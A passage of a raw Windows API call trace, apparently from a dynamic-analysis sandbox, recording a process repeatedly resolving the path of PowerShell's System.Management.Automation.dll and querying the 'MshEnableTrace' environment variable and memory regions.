lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.151] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0069.151] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.151] CoTaskMemFree (pv=0x22fde0) [0069.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.225] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.226] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0069.226] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.226] CoTaskMemFree (pv=0x22fde0) [0069.227] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.239] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0069.239] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.239] CoTaskMemFree (pv=0x22fde0) [0069.239] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0069.239] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.239] CoTaskMemFree (pv=0x22fde0) [0069.240] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0069.240] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.240] CoTaskMemFree (pv=0x22fde0) [0069.241] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0069.241] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.241] CoTaskMemFree (pv=0x22fde0) [0069.241] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0069.241] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.241] CoTaskMemFree (pv=0x22fde0) [0069.242] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0069.242] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, 